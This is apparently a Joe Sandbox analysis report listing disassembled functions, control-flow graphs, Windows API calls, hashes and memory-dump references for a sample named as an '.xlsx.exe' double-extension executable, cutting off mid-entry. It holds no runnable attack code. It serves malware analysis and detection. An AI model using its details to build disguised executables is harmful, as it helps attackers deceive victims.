                                                          Function 00402B7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 693 402b7a-402ba3 RegOpenKeyExW 694 402ba5-402bb0 693->694 695 402c0e-402c12 693->695 696 402bcb-402bdb RegEnumKeyW 694->696 697 402bb2-402bb5 696->697 698 402bdd-402bef RegCloseKey call 4062b2 696->698 699 402c02-402c05 RegCloseKey 697->699 700 402bb7-402bc9 call 402b7a 697->700 706 402bf1-402c00 698->706 707 402c15-402c1b 698->707 704 402c0b-402c0d 699->704 700->696 700->698 704->695 706->695 707->704 708 402c1d-402c2b RegDeleteKeyW 707->708 708->704 709 402c2d 708->709 709->695
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B9B
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Close$DeleteEnumOpen
                                                          • String ID:
                                                          • API String ID: 1912718029-0
                                                          • Opcode ID: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
                                                          • Instruction ID: 39c85bfe7ca74ada2351cc0a51ccebcd1f3e21716521df4e7e96f28c7df0de5f
                                                          • Opcode Fuzzy Hash: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
                                                          • Instruction Fuzzy Hash: 5B116A31904008FEEF229F90DE89EAE3B7DFB14348F100476FA01B00A0D3B59E51EA69
                                                          Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 711 10001759-10001795 call 10001b18 715 100018a6-100018a8 711->715 716 1000179b-1000179f 711->716 717 100017a1-100017a7 call 10002286 716->717 718 100017a8-100017b5 call 100022d0 716->718 717->718 723 100017e5-100017ec 718->723 724 100017b7-100017bc 718->724 727 1000180c-10001810 723->727 728 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 723->728 725 100017d7-100017da 724->725 726 100017be-100017bf 724->726 725->723 734 100017dc-100017dd call 10002b5f 725->734 730 100017c1-100017c2 726->730 731 100017c7-100017c8 call 100028a4 726->731 732 10001812-1000184c call 100015b4 call 100024a9 727->732 733 1000184e-10001854 call 100024a9 727->733 752 10001855-10001859 728->752 736 100017c4-100017c5 730->736 737 100017cf-100017d5 call 10002645 730->737 743 100017cd 731->743 732->752 733->752 746 100017e2 734->746 736->723 736->731 751 100017e4 737->751 743->746 746->751 751->723 753 10001896-1000189d 752->753 754 1000185b-10001869 call 1000246c 752->754 753->715 759 1000189f-100018a0 GlobalFree 753->759 761 10001881-10001888 754->761 762 1000186b-1000186e 754->762 759->715 761->753 764 1000188a-10001895 call 1000153d 761->764 762->761 763 10001870-10001878 762->763 763->761 765 1000187a-1000187b FreeLibrary 763->765 764->753 765->761
                                                          APIs
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                          • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                          • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                            • Part of subcall function 10002286: GlobalAlloc.KERNEL32(?,00001020), ref: 100022B8
                                                            • Part of subcall function 10002645: GlobalAlloc.KERNEL32(?,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                            • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1608943585.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1608921207.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1608963992.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1609013607.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                                          • String ID:
                                                          • API String ID: 1791698881-3916222277
                                                          • Opcode ID: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                          • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                          • Opcode Fuzzy Hash: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                          • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                          Function 00405E15 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 768 405e15-405e47 RegOpenKeyExW 769 405e89-405e8c 768->769 770 405e49-405e68 RegQueryValueExW 768->770 771 405e76 770->771 772 405e6a-405e6e 770->772 774 405e79-405e83 RegCloseKey 771->774 773 405e70-405e74 772->773 772->774 773->771 773->774 774->769
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E3F
                                                          • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E60
                                                          • RegCloseKey.ADVAPI32(?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E83
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: Call
                                                          • API String ID: 3677997916-1824292864
                                                          • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                          • Instruction ID: 600534e839ec184522a2ed62e812a695e1e378dc1a2fe7ff70d8343822b3fb0e
                                                          • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                          • Instruction Fuzzy Hash: A7015A3114020EEACB218F56EC08EEB3BA8EF54390F00413AF944D2220D334DA64CBE5
                                                          Function 00405BE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 775 405be3-405bef 776 405bf0-405c24 GetTickCount GetTempFileNameW 775->776 777 405c33-405c35 776->777 778 405c26-405c28 776->778 780 405c2d-405c30 777->780 778->776 779 405c2a 778->779 779->780
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405C01
                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405C1C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-1331003597
                                                          • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                          • Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
                                                          • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                          • Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54
                                                          Function 0040317D Relevance: 6.1, APIs: 4, Instructions: 108fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00403192
                                                            • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                          • WriteFile.KERNELBASE(0040BE90,00411737,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                          • SetFilePointer.KERNELBASE(00004DC4,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$CountTickWrite
                                                          • String ID:
                                                          • API String ID: 2146148272-0
                                                          • Opcode ID: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                          • Instruction ID: 34320a24581f7621071559271f75aff2a33e70c32c739a51ea230fcf3b1a2f41
                                                          • Opcode Fuzzy Hash: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                          • Instruction Fuzzy Hash: CB418B72504205DFDB109F29EE84AA63BADF74431671441BFE604B22E1C7B96D418BEC
                                                          Function 00403326 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 0040623F
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 00406253
                                                            • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 00406266
                                                          • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 00403347
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 4115351271-3144792594
                                                          • Opcode ID: add472499a8119111063815a34edcff77b501a95eafb2cc4bed7984a25da3e62
                                                          • Instruction ID: 64a45b222adfb8bd76fd8b495f2d7cf88aee328212c381153bc1e0c9699f7593
                                                          • Opcode Fuzzy Hash: add472499a8119111063815a34edcff77b501a95eafb2cc4bed7984a25da3e62
                                                          • Instruction Fuzzy Hash: 22D0C92251AA3135C551372A7D06FCF295C8F0A329F12A477F809B90C2CB7C2A8249FE
                                                          Function 004069D2 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                          • Instruction ID: dca007468fed7c27dd914b546e5ea1ac9ab056a0c62ecf1bea7b7831388965f7
                                                          • Opcode Fuzzy Hash: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                          • Instruction Fuzzy Hash: 58A14471E00229DBDF28CFA8C8447ADBBB1FF48305F15816AD856BB281C7785A96CF44
                                                          Function 00406BD3 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                          • Instruction ID: e31ab10654d3133c4bbe562e0396aaf9f668a3464ceaf5ac7e335a669e1e1d03
                                                          • Opcode Fuzzy Hash: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                          • Instruction Fuzzy Hash: 8E912371E00228CBEF28CF98C8587ADBBB1FF44305F15816AD856BB291C7785A96DF44
                                                          Function 004068E9 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                          • Instruction ID: e0c60a541a5106e25e0a2f50f35f038ee2aa27f15edb78bccdd8f3c871378321
                                                          • Opcode Fuzzy Hash: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                          • Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44
                                                          Function 004063EE Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                          • Instruction ID: c1f18cc480c27d0a28c5d6dc1e8cd9b1e5e62e2ab7f78041d4dc85e199002e6a
                                                          • Opcode Fuzzy Hash: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                          • Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84
                                                          Function 0040683C Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                          • Instruction ID: 317a4f11872e46a6f39a96627fb546a7164eb21cb9e645d400dda74b69288846
                                                          • Opcode Fuzzy Hash: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                          • Instruction Fuzzy Hash: 48713471D04228DFEF24CFA8C8447ADBBB1FB48305F15816AD856BB281C7785A96DF44
                                                          Function 0040695A Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                          • Instruction ID: 7b464a411068ed62169f7738ff9b09ef3af2f2625e32a791141ed05019b82bd1
                                                          • Opcode Fuzzy Hash: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                          • Instruction Fuzzy Hash: A4714571E04228DFEF28CF98C8447ADBBB1FB48301F15816AD456BB281C7785996DF44
                                                          Function 004068A6 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
